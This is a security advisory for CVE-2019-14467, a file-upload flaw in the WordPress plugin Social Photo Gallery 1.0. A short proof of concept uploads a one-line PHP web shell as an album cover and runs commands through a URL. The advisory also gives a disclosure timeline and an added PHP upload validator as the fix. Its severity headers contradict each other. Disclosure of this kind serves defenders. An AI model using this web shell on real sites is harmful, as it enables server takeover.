WordPress Social Photo Gallery 1.0 Remote Code Execution

2019.11.17
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

=============================================
PRESTIGIA SEGURIDAD ALERT 2019-001
- Original release date: July 31, 2019
- Last revised: November 13, 2019
- Discovered by: Prestigia Seguridad
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2019-14467
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution

II. BACKGROUND
-------------------------
Social Gallery is the ultimate lightbox plugin for WordPress. Your images deserve to be experienced and shared, to spark a response as they travel the social web, and to work for you by generating more fans and more Likes for your content.

III. DESCRIPTION
-------------------------
This version of the WordPress plugin Social Photo Gallery is affected by a Remote Code Execution vulnerability. The application does not check the file extension when an image is uploaded to an album, so a PHP file is stored under the web-accessible uploads directory and can be executed. To exploit the vulnerability it is only necessary to create an album in the application and attach a malicious PHP file as the album cover photo.

IV. PROOF OF CONCEPT
-------------------------
1. Create a .php file (cmd.php):

   <?php system($_GET['cmd']); ?>

2. Click Add Album, enter a name, for example "demo", and in "Cover Photo" select the cmd.php file.

3. Load the following URL:

   http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls

V. BUSINESS IMPACT
-------------------------
These attacks result in execution of local commands on the server.

VI. SYSTEMS AFFECTED
-------------------------
WordPress Plugin Social Photo Gallery 1.0

VII. SOLUTION
-------------------------
The solution is to only allow uploading digital image files: TIFF, JPEG, GIF, PNG.

VIII. REFERENCES
-------------------------
https://wordpress.org/plugins/social-photo-gallery/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Prestigia Seguridad.
Email: info@prestigiaonline.com

X. REVISION HISTORY
-------------------------
July 31, 2019      1: Initial release
November 13, 2019  2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
July 31, 2019      1: Vulnerability acquired by Prestigia Seguridad
July 31, 2019      2: Email to vendor without response
August 15, 2019    3: Second email to vendor without response
November 13, 2019  4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Prestigia Seguridad
https://seguridad.prestigia.es/
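One way to implement the allowlist proposed in the Solution section, written here as an added example in plain PHP (this is not the plugin's or the vendor's code). The function name, the `$_FILES['cover_photo']` key and `$upload_dir` are assumptions; the point is that the decision is based on the file's actual bytes and a server-generated name, never on the client-supplied filename alone.

```php
<?php
// Added example, not the plugin's own code: validate an album cover-photo
// upload by allowlisting image types and checking the file content itself.
// Only TIFF, JPEG, GIF and PNG (the types named in the advisory) are accepted.

const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'image/tiff' => 'tif',
];

/**
 * Returns a safe destination filename, or null if the upload must be rejected.
 * $file is one entry of $_FILES, e.g. $_FILES['cover_photo'] (assumed key).
 */
function validate_cover_photo(array $file): ?string {
    if (!isset($file['tmp_name'], $file['name'], $file['error'])
        || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    // 1. Extension allowlist on the client-supplied name (the check the plugin lacked).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'tif', 'tiff'], true)) {
        return null;
    }
    // 2. Sniff the MIME type from the bytes on disk; $file['type'] comes from the
    //    browser and is attacker-controlled, so it is deliberately not consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return null;
    }
    // 3. The file must actually decode as an image.
    if (getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // 4. Never reuse the user-supplied name: a random name with the extension
    //    derived from the sniffed type means no .php file can ever land on disk.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
}

// Usage in the upload handler ($upload_dir is the album directory; assumed):
// $name = validate_cover_photo($_FILES['cover_photo']);
// if ($name === null) {
//     wp_die('Only JPEG, PNG, GIF or TIFF images are accepted.');
// }
// move_uploaded_file($_FILES['cover_photo']['tmp_name'], $upload_dir . '/' . $name);
```

As defence in depth, independent of this check, the web server should also be configured not to execute scripts from the uploads directory, so a bypass of the validator does not become code execution.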


Copyright 2019, cxsecurity.com
